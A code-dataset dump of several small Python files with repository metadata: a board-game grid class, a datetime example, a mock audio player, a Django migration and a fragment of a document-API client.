url = self._gen_request_url('/open-apis/doc/v2/meta/{}'.format(doc_token))
res = self._get(url, auth_token=user_access_token)
return make_datatype(DriveDocFileMeta, res['data'])
| 0 | 1,470 | 23 |
631d0ad57e7f9c8b7dcf51cf4207ed5358680427 | 1,855 | py | Python | GameElements/boardgame.py | glauberdmo/game-project | 835a3b23a3605dc0070615962e636c754cb6c0c5 | [
"Unlicense"
] | null | null | null | GameElements/boardgame.py | glauberdmo/game-project | 835a3b23a3605dc0070615962e636c754cb6c0c5 | [
"Unlicense"
] | null | null | null | GameElements/boardgame.py | glauberdmo/game-project | 835a3b23a3605dc0070615962e636c754cb6c0c5 | [
"Unlicense"
] | null | null | null | from typing import List
import numpy as np
EMPTY_SYMBOL = "_"
#Validators
| 28.106061 | 71 | 0.563342 | from typing import List
import numpy as np
EMPTY_SYMBOL = "_"
class Boardgame:
def __init__(self, board_h:int, board_w:int):
#boardgame is a 2d numpy array
self.board_h = board_h
self.board_w = board_w
self.board = np.zeros((board_h, board_w), dtype=str)
self.board.fill(EMPTY_SYMBOL)
self.units_in_play = [object]
def __setitem__(self,points:tuple,value):
x,y = points
self.board[x,y] = value
def __getitem__(self, x,y):
return self.board[x,y]
def print_board(self):
print(self.board)
print("\n")
def get_unit_by_xy(self, x:int, y:int) -> object:
for unit in self.units_in_play:
try:
if unit.x == x and unit.y == y:
return unit
except AttributeError:
pass
return None
def add_unit(self, new_unit:object):
self.units_in_play.append(new_unit)
self.board[new_unit.y, new_unit.x] = new_unit.symbol
def remove_unit(self, unit_to_remove:object):
self.board[unit_to_remove.y, unit_to_remove.x] = EMPTY_SYMBOL
self.units_in_play.remove(unit_to_remove)
#Validators
def xy_is_empty(self, x:int, y:int) -> bool:
#returns true if the xy is empty
if self.board[y, x] == EMPTY_SYMBOL:
return True
else:
print("move failed: there is a unit in this position")
return False
def xy_is_valid(self, x:int, y:int) -> bool:
#returns true if xy is inside the board
if x < self.board_w and x >= 0 and y < self.board_h and y >= 0:
return True
else:
print("move failed: xy is not inside the board")
return False
| 1,457 | -5 | 296 |
21eab977b3a2d85635e8b4aca52f5e2b2a884b9e | 56 | py | Python | 04/01/instance_method/timetz.py | pylangstudy/201709 | 53d868786d7327a83bfa7f4149549c6f9855a6c6 | [
"CC0-1.0"
] | null | null | null | 04/01/instance_method/timetz.py | pylangstudy/201709 | 53d868786d7327a83bfa7f4149549c6f9855a6c6 | [
"CC0-1.0"
] | 32 | 2017-09-01T00:52:17.000Z | 2017-10-01T00:30:02.000Z | 04/01/instance_method/timetz.py | pylangstudy/201709 | 53d868786d7327a83bfa7f4149549c6f9855a6c6 | [
"CC0-1.0"
] | null | null | null | import datetime
print(datetime.datetime.now().timetz())
| 18.666667 | 39 | 0.785714 | import datetime
print(datetime.datetime.now().timetz())
| 0 | 0 | 0 |
2faf25ff3604020d474509c409ccb362674d5d4d | 753 | py | Python | audiotype/MockAudioType.py | monsdar/Mubox | e06e73903b1b7fdd8da48b6189b238ee25a57242 | [
"MIT"
] | null | null | null | audiotype/MockAudioType.py | monsdar/Mubox | e06e73903b1b7fdd8da48b6189b238ee25a57242 | [
"MIT"
] | null | null | null | audiotype/MockAudioType.py | monsdar/Mubox | e06e73903b1b7fdd8da48b6189b238ee25a57242 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
'''
This AudioType only prints some info onto the console
'''
import logging
from audiotype.IAudioType import IAudioType | 30.12 | 83 | 0.658699 | #!/usr/bin/env python3
'''
This AudioType only prints some info onto the console
'''
import logging
from audiotype.IAudioType import IAudioType
class MockAudioType(IAudioType):
def __init__(self):
self.currentTag = ""
self.currentConfig = None
self.logger = logging.getLogger("mubox.MockAudioType")
def IsResponsible(self, typeIdentifier): #this type can handle any typestrings
return True
def PlayTag(self, tag, configuration):
self.currentTag = tag
self.currentConfig = configuration
self.logger.info("Playing tag '" + tag + "' with config: " + configuration)
def StopTag(self):
self.logger.info("Stopping to play tag '" + self.currentTag + "'") | 447 | 11 | 150 |
0eba93c3d67b55a38cc6f97c9b04103a070a3ad1 | 498 | py | Python | backend/apps/banking/migrations/0005_auto_20200606_1325.py | anilvrathod1/bestCDK | c940f27da8e0bcafb901f1f10adfb42308f49543 | [
"MIT"
] | 1 | 2020-07-06T12:34:50.000Z | 2020-07-06T12:34:50.000Z | backend/apps/banking/migrations/0005_auto_20200606_1325.py | anilvrathod1/bestCDK | c940f27da8e0bcafb901f1f10adfb42308f49543 | [
"MIT"
] | null | null | null | backend/apps/banking/migrations/0005_auto_20200606_1325.py | anilvrathod1/bestCDK | c940f27da8e0bcafb901f1f10adfb42308f49543 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.6 on 2020-06-06 13:25
import backend.storage_backends
from django.db import migrations, models
| 24.9 | 110 | 0.668675 | # Generated by Django 3.0.6 on 2020-06-06 13:25
import backend.storage_backends
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('banking', '0004_transaction_source_file'),
]
operations = [
migrations.AlterField(
model_name='statementfile',
name='statement_file',
field=models.FileField(storage=backend.storage_backends.PrivateMediaStorage, upload_to='banking'),
),
]
| 0 | 352 | 23 |